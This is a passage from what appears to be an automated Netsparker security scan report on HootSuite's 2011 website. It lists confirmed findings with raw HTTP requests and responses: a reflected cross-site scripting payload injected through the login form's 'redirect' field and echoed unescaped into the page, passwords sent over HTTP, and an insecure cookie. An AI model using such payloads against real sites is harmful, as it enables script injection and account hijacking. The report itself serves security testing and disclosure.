</div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.2166 | 0.001 | 0.5% | 1">&copy;2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
- /login

/login CONFIRMED

https://hootsuite.com/login

Parameters

Parameter Type Value
loginInfo%5Bemail%5D POST netsparker@example.com
loginInfo%5Bpassword%5D POST 3
loginInfo%5BrememberMe%5D POST on
redirect POST '"--></style></script><script>alert(0x000A2D)</script>
form_submit POST Login

Request

POST /login HTTP/1.1
Referer: http://hootsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hootsuite.com
Cookie: _SID=34a0f858bab3c6abbb550a36dfd8e5ea04ac805e; signup_plan_id=2
Content-Length: 213
Accept-Encoding: gzip, deflate

loginInfo%5Bemail%5D=netsparker%40example.com&loginInfo%5Bpassword%5D=3&loginInfo%5BrememberMe%5D=on&redirect='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A2D)%3c%2fscript%3e&form_submit=Login

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:25:39 GMT
Content-Type: text/html
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 18
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div class="errorMessage global-message rb-a-4" id="flashMessage_Error"> <a class="icon-19 close" onclick="fadeSlideRemove($('#flashMessage_Error')); return false;">Close</a> <h3>Error</h3> <strong>There are errors, please check the message below.</strong> </div> <div id="content"> <div class="primary login rb-a-5">
<div class="title">
<h1><a href="index.php">HootSuite - Social Media Dashboard</a></h1>
<h2>Login</h2>
</div>

<div class="section">

<div id="loginBox" class="rb-a-4">

<div id="openId">

<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<input type="hidden" name="redirect" value="'"--></style></script><script>netsparker(0x000A2D)</script>"/> <div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div>


<div id="secureId">

<form name="memberLoginForm" id="memberLoginForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login">
<label for="email" class="title">Email:</label>
<input id="email" type="text" name="loginInfo[email]" value="" maxlength="100" />
<p class="formError">The supplied email can not be found</p>
<label for="password" class="title">Password:</label>
<input id="password" type="password" name="loginInfo[password]" maxlength="100" />
<p class="formError"></p>
<p class="forgotPassword"><a href="http://hootsuite.com/retrieve-password"><strong>Forgot my password</strong></a></p>
<p class="remember">
<label class="title"><input id="remember" class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked />&nbsp;Remember me</label>
</p>
<div class="btns">
<a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#memberLoginForm').submit();">Secure Login</a>
</div>
<div class="info">
Don't have an account? <a href="https://hootsuite.com/signup"><strong>Sign Up</strong></a>
</div>

<input type="hidden" name="redirect" value="&#039;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A2D)&lt;/script&gt;" />
<input type="hidden" name="form_submit" value="Login" />
</form>
</div>


</div>
</div>
</div>

</div> <div id="footer"> <div class="footerLinks"> <span class="copy" title="0.2069 | 0.0126 | 6.1% | 1">&copy;2008-2011 <a href="http://blog.hootsuite.com/company/" title="HootSuite Media" target="_blank">HootSuite Media</a></span> <div class="language"> <form name="languageSelectionForm" id="languageSelectionForm" method="get" formtype="input" action=""> <label for="language" class="title">Language: </label> <select name="language" onChange="changeSiteLanguage();return false;"> <option label="English" value="en" selected="selected">English</option><option label="French (Français)" value="fr">French (Français)</option><option label="Italian (Italiano)" value="it">Italian (Italiano)</option><option label="Japanese (日本語)" value="ja">Japanese (日本語)</option> </select></form> <script type="text/javascript">$(document).ready(function() { $("#languageSelectionForm select[name='language'] option[value='ja']").after('<option disabled="disabled">--------------------</option>');});function changeSiteLanguage(){ hs.statusObj.update(translation._("Switching language..."), 'info', true, 8000); var lang = $("#languageSelectionForm select option:selected").val(); ajaxCall({ type: 'POST', data: "language="+lang, url: "/ajax/index/change-language", success: function(data) { hs.statusObj.reset(); if (data.success) { //window.location=window.location.href; if ($.isFunction(window.location.reload)) { window.location.reload(true); // force reload } else { window.location = hs.c.rootUrl; } } else if (data.inProgress) { var params = { width: 347, maxHeight: 700, resizable: false, draggable: false, position: ['center', 60], modal: true, title: translation._("HootSuite Translation Project"), content: hsEjs.getEjs('index/language_translation').render(data) }, $popup = $.dialogFactory.create('inProgressLanguagePopup', params); return false; } else { if (data.paymentProcessorUnavailable && hs.statusObj != undefined) { hs.statusObj.update(translation._("Sorry, we are unable to complete this operation right now. Please try again later."), "error", true); } } }, error: function(){hs.statusObj.reset();} }, 'abortOld'); }</script> </div> <a href="http://feedback.hootsuite.com" target="_blank" class="_feedback">Feedback</a> | <a href="http://help.hootsuite.com" target="_blank">Help Desk</a> | <a href="http://blog.hootsuite.com/company/" target="_blank">Company</a> | <a href="http://hootsuite.com/about">About</a> | <a href="http://help.hootsuite.com/forums/81675-faqs" target="_blank">FAQ</a> | <a href="http://blog.hootsuite.com/" target="_blank">Blog</a> | <a href="http://hootsuite.com/terms">Terms</a> | <a href="http://hootsuite.com/privacy">Privacy Policy</a> | <a href="http://hootsuite.com/affiliate">Affiliate</a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function() { hs.statusObj = new statusObject(); }); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var _kmq = _kmq || []; var KM_NO_SWF = true; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/9c36ff6b1b1674dd970bc16e44d393a735ff3290.1.js'); //dev </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-17737250-1"); pageTracker._trackPageview(); } catch(err) {} </script> <script type="text/javascript"> __compete_code = '71a19afdb2cc5969a9b8957043af665b'; (function () { var s = document.createElement('script'), e = document.getElementsByTagName('script')[0], t = document.location.protocol.toLowerCase() === 'https:' ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = true; if (e) { e.parentNode.insertBefore(s, e); } }()); </script> <!--[if lt IE 7]> <script src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/third_party/ie6warning.js"></script><script>window.onload=function(){e("js/ie6/")}</script> <![endif]--> <!-- Segment Pixel – Hootsuite - DO NOT MODIFY --> <img src="https://secure.adnxs.com/seg?add=67726&t=2" width="1" height="1" /> <!-- End of Segment Pixel --> </body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /mobile/member/login

/mobile/member/login CONFIRMED

http://hootsuite.com/mobile/member/login

Form target action

http://hootsuite.com/mobile/member/login

Request

GET /mobile/member/login HTTP/1.1
Referer: http://hootsuite.com/mobile/index
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; signup_plan_id=2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:05 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 1419


<html> <head> <meta content='text/html; charset=Shift_JIS' http-equiv='Content-Type'> <title> HootSuite </title> </meta> </head> <body> <a href='/mobile/index'> <img id='top' name='top' src='http://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/mobile/jp/hs_logo.png' /> </a> <br /> <!--<p>Welcome to the Keitai version of HootSuite -- your social media dashboard.</p><p>Manage and update your Twitter and mixi accounts from one location using HootSuite. Save multiple custom searches to your account and view them easily from your phone. More social networks and features coming soon.</p><p>Also check out http://hootsuite.com from your computer to see our additional web-only features. Apps are also available for <a href='http://hootsuite.com/iphone'>iPhone</a> and <a href='http://hootsuite.com/android'>Android</a>.</p>--><p> HootSuite�g�єłɂ悤����!</p><p> HootSuite��g���āATwitter��mixi�̃A�J�E���g�𓯎��ɊǗ����Ă݂܂��傤�B�������ʂ�A�J�E���g���Ȃǂ�{���A�ۑ��A�����S�Ă�g�ѓd�b��Łc�B���̃\�[�V�����l�b�g���[�N����X�Ɨ��p�”\�ɂȂ�\��ŊJ���҈ꓯ����΂��Ă��܂��B</p><p> �܂��A�����낵����� http://hootsuite.com ��m�F���āAWeb����̂ݗ��p�”\�ȑ��̋@�\��m�F���Ă݂Ă��������B <a href='http://hootsuite.com/iphone'>iPhone</a> �� <a href='http://hootsuite.com/android'>Android</a> �̂��߂̃l�C�e�B�u�A�v��������Ă���܂��B</p><br /><table cellpadding='5' cellspacing='0' width='100%'> <tr> <td bgcolor='#dddddd'> ���O�C�� </td> </tr></table><form action='http://hootsuite.com/mobile/member/login' formtype='input' id='memberLoginForm' method='post' name='memberLoginForm'> ���[���A�h���X�F <font color='#ff0000'> </font> <br /> <input id='email' maxlength='100' mode='alphabet' name='loginInfo[email]' type='text' value='' /> <br /> �p�X���[�h�F <font color='#ff0000'> </font> <br /> <input id='password' maxlength='100' name='loginInfo[password]' type='password' value='' /> <br /> <input name='form_submit' type='hidden' value='Login' /> <input type='submit' value='���O�C��' /></form><a href='/mobile/member/signup'> �T�C���A�b�v</a><br /><br /><table cellpadding='5' cellspacing='0' width='100%'> <tr> <td bgcolor='#dddddd'> �ŐV��� </td> </tr></table><ul> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/457415-bulk' target='_blank'> Bulk�X�P�W���[�� </a> </li> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/455464-facebook' target='_blank'> Facebook�y�[�W�̍ĔF�� </a> </li> <li> <a href='http://www.google.co.jp/gwt/x?u=http://jp.hootsuite.com/entries/455453-page-pleasers-facebook' target='_blank'> Page Pleasers�`Facebook�y�[�W�A�b�v�f�[�g�` </a> </li> </ul> </body> <hr /> <center> <font color='#888888'> &copy;2010 HootSuite </font> </center></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /signup

/signup CONFIRMED

https://hootsuite.com/signup?planId=2

Identified Cookie

signup_plan_id

Request

GET /signup?planId=2 HTTP/1.1
Referer: http://hootsuite.com/affiliate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:04 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: signup_plan_id=2; expires=Tue, 01-Mar-2011 14:23:04 GMT; path=/
X-Gridnum: 23
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 10997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container"> <div id="content"> <div class="primary signup rb-a-5"> <div class="title"> <h1><a href="http://hootsuite.com">HootSuite - Social Media Dashboard</a></h1> <h2>Signup</h2> </div> <div class="section"> <div class="signupform rb-a-3"> <h2>Create Your Account</h2> <div> <span>Selected Plan: </span><span>Pro</span> ( $5.99 ) <a href="http://hootsuite.com/plans">Change</a> </div> <form name="memberSignupForm" id="memberSignupForm" method="post" formtype="input" onKeyPress="checkForEnterKey(event, '_submitSignup');" action="https://hootsuite.com/signup"> <input type="hidden" name="planId" value="2" /> <input type="hidden" name="owlyPro" value="" /> <label for="email" class="title">Email Address: <span class="required">*</span></label> <input id="email" type="text" name="member[email]" value="" maxlength="100" /> <div class="formError"></div> <label for="fullName" class="title">Full Name: <span class="required">*</span></label> <input id="fullName" type="text" name="member[fullName]" value="" maxlength="100" /> <div class="formError"></div> <label for="password" class="title">Password: <span class="required">*</span></label> <input id="password" type="password" name="member[password]" maxlength="100" /> <div class="formError"></div> <label for="confirmPassword" class="title">Confirm Password: <span class="required">*</span></label> <input id="confirmPassword" type="password" name="member[confirmPassword]" maxlength="100" /> <div style="display: ;"> <label for="timeZone" class="title">Time Zone: <span class="required">*</span></label> <div class="formError"></div> <select name="member[defaultTimezone]" id="timeZone"><option label="Select your local timezone...." value="none">Select your local timezone....</option><option label="US/Adak" value="America/Adak">US/Adak</option><option label="US/Anchorage" value="America/Anchorage">US/Anchorage</option><option label="US/Boise" value="America/Boise">US/Boise</option><option label="US/Chicago" value="America/Chicago" selected="selected">US/Chicago</option><option label="US/Denver" value="America/Denver">US/Denver</option><option label="US/Detroit" value="America/Detroit">US/Detroit</option><option label="US/Honolulu" value="Pacific/Honolulu">US/Honolulu</option><option label="US/Indiana/Indianapolis" value="America/Indiana/Indianapolis">US/Indiana/Indianapolis</option><option label="US/Indiana/Knox" value="America/Indiana/Knox">US/Indiana/Knox</option><option label="US/Indiana/Marengo" value="America/Indiana/Marengo">US/Indiana/Marengo</option><option label="US/Indiana/Petersburg" value="America/Indiana/Petersburg">US/Indiana/Petersburg</option><option label="US/Indiana/Tell_City" value="America/Indiana/Tell_City">US/Indiana/Tell_City</option><option label="US/Indiana/Vevay" value="America/Indiana/Vevay">US/Indiana/Vevay</option><option label="US/Indiana/Vincennes" value="America/Indiana/Vincennes">US/Indiana/Vincennes</option><option label="US/Indiana/Winamac" value="America/Indiana/Winamac">US/Indiana/Winamac</option><option label="US/Juneau" value="America/Juneau">US/Juneau</option><option label="US/Kentucky/Louisville" value="America/Kentucky/Louisville">US/Kentucky/Louisville</option><option label="US/Kentucky/Monticello" value="America/Kentucky/Monticello">US/Kentucky/Monticello</option><option label="US/Los_Angeles" value="America/Los_Angeles">US/Los_Angeles</option><option label="US/Menominee" value="America/Menominee">US/Menominee</option><option label="US/New_York" value="America/New_York">US/New_York</option><option label="US/Nome" value="America/Nome">US/Nome</option><option label="US/North_Dakota/Center" value="America/North_Dakota/Center">US/North_Dakota/Center</option><option label="US/North_Dakota/New_Salem" value="America/North_Dakota/New_Salem">US/North_Dakota/New_Salem</option><option label="US/Phoenix" value="America/Phoenix">US/Phoenix</option><option label="US/Shiprock" value="America/Shiprock">US/Shiprock</option><option label="US/Yakutat" value="America/Yakutat">US/Yakutat</option><option label="Canada/Atikokan" value="America/Atikokan">Canada/Atikokan</option><option label="Canada/Blanc-Sablon" value="America/Blanc-Sablon">Canada/Blanc-Sablon</option><option label="Canada/Cambridge_Bay" value="America/Cambridge_Bay">Canada/Cambridge_Bay</option><option label="Canada/Dawson" value="America/Dawson">Canada/Dawson</option><option label="Canada/Dawson_Creek" value="America/Dawson_Creek">Canada/Dawson_Creek</option><option label="Canada/Edmonton" value="America/Edmonton">Canada/Edmonton</option><option label="Canada/Glace_Bay" value="America/Glace_Bay">Canada/Glace_Bay</option><option label="Canada/Goose_Bay" value="America/Goose_Bay">Canada/Goose_Bay</option><option label="Canada/Halifax" value="America/Halifax">Canada/Halifax</option><option label="Canada/Inuvik" value="America/Inuvik">Canada/Inuvik</option><option label="Canada/Iqaluit" value="America/Iqaluit">Canada/Iqaluit</option><option label="Canada/Moncton" value="America/Moncton">Canada/Moncton</option><option label="Canada/Montreal" value="America/Montreal">Canada/Montreal</option><option label="Canada/Nipigon" value="America/Nipigon">Canada/Nipigon</option><option label="Canada/Pangnirtung" value="America/Pangnirtung">Canada/Pangnirtung</option><option label="Canada/Rainy_River" value="America/Rainy_River">Canada/Rainy_River</option><option label="Canada/Rankin_Inlet" value="America/Rankin_Inlet">Canada/Rankin_Inlet</option><option label="Canada/Regina" value="America/Regina">Canada/Regina</option><option label="Canada/Resolute" value="America/Resolute">Canada/Resolute</option><option label="Canada/St_Johns" value="America/St_Johns">Canada/St_Johns</option><option label="Canada/Swift_Current" value="America/Swift_Current">Canada/Swift_Current</option><option label="Canada/Thunder_Bay" value="America/Thunder_Bay">Canada/Thunder_Bay</option><option label="Canada/Toronto" value="America/Toronto">Canada/Toronto</option><option label="Canada/Vancouver" value="America/Vancouver">Canada/Vancouver</option><option label="Canada/Whitehorse" value="America/Whitehorse">Canada/Whitehorse</option><option label="Canada/Winnipeg" value="America/Winnipeg">Canada/Winnipeg</option><option label="Canada/Yellowknife" value="America/Yellowknife">Canada/Yellowknife</option><option label="(GMT-11) Pacific/Apia" value="Pacific/Apia">(GMT-11) Pacific/Apia</option><option label="(GMT-11) Pacific/Midway" value="Pacific/Midway">(GMT-11) Pacific/Midway</option><option label="(GMT-11) Pacific/Niue" value="Pacific/Niue">(GMT-11) Pacific/Niue</option><option label="(GMT-11) Pacific/Pago_Pago" value="Pacific/Pago_Pago">(GMT-11) Pacific/Pago_Pago</option><option label="(GMT-10) Pacific/Fakaofo" value="Pacific/Fakaofo">(GMT-10) Pacific/Fakaofo</option><option label="(GMT-10) Pacific/Johnston" value="Pacific/Johnston">(GMT-10) Pacific/Johnston</option><option label="(GMT-10) 